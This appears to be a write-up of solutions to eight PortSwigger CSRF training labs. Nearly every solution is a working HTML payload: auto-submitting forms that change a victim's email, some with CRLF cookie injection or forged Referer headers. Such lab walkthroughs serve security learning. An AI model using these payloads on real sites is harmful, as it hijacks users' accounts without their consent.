PortSwigger lab: CSRF attack exercises

Published 19 May 2022, 17:42

PortSwigger lab: CSRF exercises

Lab 1: CSRF with no defenses

Lab

no-defenses

Description

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

Solution

Submit this code in the exploit server body

<form method='POST' action='https://acde1fc31ec13a0dc07001cb00ee0021.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
    document.forms[0].submit()
</script>

Lab 2: CSRF where token validation depends on request method

Lab

token-validation-depends-on-request-method

Description

This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Solution

Similar to the previous lab: the csrf token is only validated when the request method is POST. Change the method to GET and the check is bypassed; success.

<form method='GET' action='https://acde1fc31ec13a0dc07001cb00ee0021.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
    document.forms[0].submit()
</script>

Lab 3: CSRF where token validation depends on the token being present

Lab

token-validation-depends-on-token-being-present

Description

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Solution

A head-in-the-sand defense: if no csrf parameter is submitted at all, nothing is validated (

<form method='POST' action='https://ac591f121eb7d5edc010564800fd0065.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
    document.forms[0].submit()
</script>

Lab 4: CSRF where the token is not tied to the user session

Lab

token-not-tied-to-user-session

Description

This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't integrated into the site's session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

wiener:peter
carlos:montoya

Solution

Log in to each of the two accounts and observe their csrf tokens

wiener:NeoFBNVGzJ4WSZ9n6ILgIgRb4JoSrVDs

carlos:A6WdJmuOtcyIHypJOzLUy4ajiobIMiJk

No relationship between them is apparent. Logged in as carlos, submit the change using wiener's csrf token: success.

Repeating the operation fails, so the csrf token is presumably single-use: burn after reading.

<form method='GET' action='https://acdd1fd01e2f7e32c0cc0ce800180066.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
    <input type='hidden' name='csrf' value='0tN5lxMWb84fEo6zRF9uD6afduAZ6ube'>
</form>
<script>
    document.forms[0].submit()
</script>

Lab 5: CSRF where the token is tied to a non-session cookie (unrelated to the user session)

Lab

token-tied-to-non-session-cookie

Description

This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

wiener:peter
carlos:montoya

Solution

On the login page, observe the Response Headers

Set-Cookie: csrfkey=aZJsgXBEJsomTOPLraWieagM2XTqAkSE

csrf token: prLP0aZnkcH5TstFljVHs1D9dd68K13E

The csrf token corresponds to the csrfkey value from Set-Cookie

<form method='POST' action='https://ac871f561e71b4bfc0f3546f008400ce.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
    <input type='hidden' name='csrf' value='prLP0aZnkcH5TstFljVHs1D9dd68K13E'>
</form>
<img src="https://ac871f561e71b4bfc0f3546f008400ce.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=aZJsgXBEJsomTOPLraWieagM2XTqAkSE" onerror="document.forms[0].submit()">

Lab 6: CSRF where the token is duplicated in a cookie

Lab

token-duplicated-in-cookie

Description

This lab's email change functionality is vulnerable to CSRF. It attempts to use the insecure "double submit" CSRF prevention technique.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Solution

Similar to the previous lab: the csrf token is stored directly in a cookie, so inject a Set-Cookie header to overwrite the cookie value

<form method='POST' action='https://acf81f221fbc9bc3c0212ef400b3007f.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
    <input type='hidden' name='csrf' value='csrf'>
</form>
<img src="https://acf81f221fbc9bc3c0212ef400b3007f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=csrf" onerror="document.forms[0].submit()">

Lab 7: CSRF where Referer validation depends on the header being present

Lab

referer-validation-depends-on-header-being-present

Description

This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Solution

Referrer Policy: a request carries a Referer header naming the page it was navigated from. It is commonly used for analytics such as where users came from, but it is also a potential security risk for the user.

Add no-referrer to the page so that no Referer is sent, which bypasses the Referer check

<meta name='Referrer' content='no-referrer'>
<form method='POST' action='https://ac5c1f911eff3a8ec1a3ba80006a00b1.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
    document.forms[0].submit()
</script>

Lab 8: CSRF with sloppy Referer validation

Lab

referer-validation-broken

Description

This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Solution

This lab only checks that the Referer contains the expected string, so inserting the expected Referer anywhere in the Referer is enough to bypass it

history.pushState writes an entry into the browser history to forge the Referer; set Referrer-Policy to unsafe-url in the response headers so the browser does not strip the forged Referer

head:

Referrer-Policy: unsafe-url

body:

<meta name='Referrer' content='unsafe-url'>
<form method='POST' action='https://ac611f301f6d4603c0902acb00e200aa.web-security-academy.net/my-account/change-email'>
    <input type='hidden' name='email' value='Hacker@hack.com'>
</form>
<script>
    history.pushState("", "", "/?ac611f301f6d4603c0902acb00e200aa.web-security-academy.net")
    document.forms[0].submit()
</script>
